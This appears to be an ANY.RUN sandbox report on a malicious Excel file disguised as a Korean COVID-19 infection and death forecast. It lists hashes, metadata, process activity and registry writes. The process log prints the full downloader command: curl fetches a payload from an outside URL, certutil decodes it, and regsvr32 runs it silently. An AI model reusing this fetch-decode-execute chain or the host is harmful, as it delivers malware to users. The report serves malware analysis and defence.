File name:

COVID-19 감염자 및 사망자 예측.xls

Full analysis: https://app.any.run/tasks/9041bc91-86c0-4ca0-8e36-e7a0330a7efc
Verdict: Malicious activity
Analysis date: July 13, 2020, 01:08:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
covid19
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: openpyxl, Last Saved By: USER, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jul 8 18:51:14 2020, Last Saved Time/Date: Thu Jul 9 08:16:08 2020, Security: 0
MD5:

268EFE92A6E16C89E62BF0C32113D0C9

SHA1:

D42D766A18FC56170FF2978A2BF07BD9CAFAC3E8

SHA256:

00E82DD014370C9DB5A95FD0FD3A5438E4A51F4D64A15DDFFAA77F2E806D2A74

SSDEEP:

6144:wxEtjPOtioVjDGUU1qfDlavx+W2QnAbz3t3uWT9qwxfRj1NlSgD8lNSQyURDKVyc:c35v5fjvlZDKoQ949IQgQ9zU+kcC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 3208)

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3208)

  • SUSPICIOUS

    • Starts CertUtil for decode files

      • cmd.exe (PID: 2108)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2108)

  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 3208)

    • Drops Coronavirus (possible) decoy

      • EXCEL.EXE (PID: 3208)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (48)
.xls | Microsoft Excel sheet (alternate) (39.2)

EXIF

FlashPix

Author: openpyxl
LastModifiedBy: USER
Software: Microsoft Excel
CreateDate: 2020:07:08 17:51:14
ModifyDate: 2020:07:09 07:16:08
Security: None
CodePage: Unicode (UTF-8)
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • world_case
  • world_death
  • asia_case
  • asia_death
  • europe_case
  • europe_death
  • america_case
  • america_death
  • africa_case
  • africa_death
  • ocean_case
  • ocean_death
  • 자료
  • 감염자 예측
  • 사망자 예측
HeadingPairs:
  • Worksheets
  • 15
CompObjUserTypeLen: 31
CompObjUserType: Microsoft Excel 2003 Worksheet
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
5
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start excel.exe no specs cmd.exe no specs certutil.exe no specs cmd.exe no specs timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
860timeout 60C:\Windows\system32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\timeout.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
2088certutil -decode "C:\Users\admin\AppData\Local\Temp\1.tmp" "C:\Users\admin\AppData\Local\Temp\lk.tmp"C:\Windows\system32\certutil.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
2147942402
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\certutil.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\certcli.dll
c:\windows\system32\atl.dll
2108cmd /c curl "http://refeeldominicana.nwideas.com/wp-content/uploads/chimps/category.php" -o "%temp%\1.tmp"&certutil -decode "%temp%\1.tmp" "%temp%\lk.tmp"&cmd /c del "%temp%\1.tmp"&timeout 60&regsvr32 /s "%temp%\lk.tmp"C:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3088cmd /c del "C:\Users\admin\AppData\Local\Temp\1.tmp"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3208"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
Total events
796
Read events
666
Write events
114
Delete events
16

Modification events

(PID) Process:(3208) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:writeName:t)4
Value:
74293400880C0000010000000000000000000000
(PID) Process:(3208) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3208) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
Off
(PID) Process:(3208) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
Off
(PID) Process:(3208) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
Off
(PID) Process:(3208) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
Off
(PID) Process:(3208) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
Off
(PID) Process:(3208) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
Off
(PID) Process:(3208) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
Off
(PID) Process:(3208) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1042
Value:
Off
Executable files
0
Suspicious files
1
Text files
0
Unknown types
7

Dropped files

PID
Process
Filename
Type
3208EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRCD45.tmp.cvr
MD5:
SHA256:
3208EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF9457A71352E07E7A.TMP
MD5:
SHA256:
3208EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF1486B84E371BE188.TMP
MD5:
SHA256:
3208EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F977D3F7.emfemf
MD5:
SHA256:
3208EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D390F41.emfemf
MD5:
SHA256:
3208EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1CA92D8C.emfemf
MD5:
SHA256:
3208EXCEL.EXEC:\Users\admin\AppData\Local\Temp\COVID-19 감염자 및 사망자 예측.xlsdocument
MD5:
SHA256:
3208EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B552AC4E.emfemf
MD5:
SHA256:
3208EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F226BC40.emfemf
MD5:
SHA256:
3208EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1A4847B.emfemf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
COVID-19 감염자 및 사망자 예측.xls